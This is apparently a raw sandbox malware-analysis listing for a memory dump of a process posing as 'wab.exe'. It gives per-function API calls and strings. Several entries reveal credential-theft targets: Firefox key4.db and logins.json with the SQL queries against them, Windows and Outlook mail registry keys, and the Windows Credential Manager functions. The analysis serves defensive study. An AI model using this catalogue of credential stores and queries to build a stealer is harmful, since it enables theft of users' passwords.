                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                • memset.MSVCRT ref: 0040128E
                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2998058495-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                                • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                • strlen.MSVCRT ref: 0040BEFE
                                                                                                                • strlen.MSVCRT ref: 0040BF0C
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                • memset.MSVCRT ref: 0040BFDB
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp$memcpy
                                                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                • , xrefs: 00406834
                                                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                • key4.db, xrefs: 00406756
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                  • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                                                • memset.MSVCRT ref: 0040F187
                                                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                • _mbscpy.MSVCRT ref: 0040F2CD
                                                                                                                • _mbscpy.MSVCRT ref: 0040F30E
                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi
                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00444612
                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                • strlen.MSVCRT ref: 0044462E
                                                                                                                • memset.MSVCRT ref: 00444668
                                                                                                                • memset.MSVCRT ref: 0044467C
                                                                                                                • memset.MSVCRT ref: 00444690
                                                                                                                • memset.MSVCRT ref: 004446B6
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                • memcpy.MSVCRT ref: 004446ED
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                • memcpy.MSVCRT ref: 00444729
                                                                                                                • memcpy.MSVCRT ref: 0044473B
                                                                                                                • _mbscpy.MSVCRT ref: 00444812
                                                                                                                • memcpy.MSVCRT ref: 00444843
                                                                                                                • memcpy.MSVCRT ref: 00444855
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                • String ID: salu
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 2449869053-232097475
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • strlen.MSVCRT ref: 00443AD2
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                • memset.MSVCRT ref: 00443B2E
                                                                                                                • memset.MSVCRT ref: 00443B4B
                                                                                                                • _mbscpy.MSVCRT ref: 00443B79
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00443C2C
                                                                                                                  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                Strings
                                                                                                                • Salt, xrefs: 00443BA7
                                                                                                                • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                • API String ID: 665470638-2687544566
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • sprintf.MSVCRT ref: 0040957B
                                                                                                                • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                • sprintf.MSVCRT ref: 004095EB
                                                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                • memset.MSVCRT ref: 0040961C
                                                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                                                • API String ID: 3259144588-3822380221
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                • API String ID: 2449869053-4258758744
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                • memset.MSVCRT ref: 0040F84A
                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                • String ID: Creds$ps:password
                                                                                                                • API String ID: 551151806-1872227768
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • wcsstr.MSVCRT ref: 0040426A
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                • _mbscpy.MSVCRT ref: 004042D5
                                                                                                                • _mbscpy.MSVCRT ref: 004042E8
                                                                                                                • strchr.MSVCRT ref: 004042F6
                                                                                                                • strlen.MSVCRT ref: 0040430A
                                                                                                                • sprintf.MSVCRT ref: 0040432B
                                                                                                                • strchr.MSVCRT ref: 0040433C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                                                • API String ID: 3866421160-4070641962
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _mbscpy.MSVCRT ref: 00409749
                                                                                                                • _mbscpy.MSVCRT ref: 00409759
                                                                                                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                • _mbscpy.MSVCRT ref: 004097A1
                                                                                                                • memset.MSVCRT ref: 004097BD
                                                                                                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                • API String ID: 1035899707-3647959541
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy
                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                • API String ID: 714388716-318151290
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                  • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                  • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                  • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                • String ID:
                                                                                                                • API String ID: 1416211542-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                • API String ID: 2360744853-2229823034
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                • memset.MSVCRT ref: 00402C9D
                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                • memset.MSVCRT ref: 00402CF7
                                                                                                                • sprintf.MSVCRT ref: 00402D10
                                                                                                                • sprintf.MSVCRT ref: 00402D4E
                                                                                                                  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                  • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                • API String ID: 1831126014-3814494228
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                                                • _mbscpy.MSVCRT ref: 004100F2
                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                • _mbscpy.MSVCRT ref: 00410142
                                                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                                                • memset.MSVCRT ref: 00410129
                                                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                                                                                • memset.MSVCRT ref: 00410171
                                                                                                                • memcpy.MSVCRT ref: 0041018C
                                                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 912701516-1821301763
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

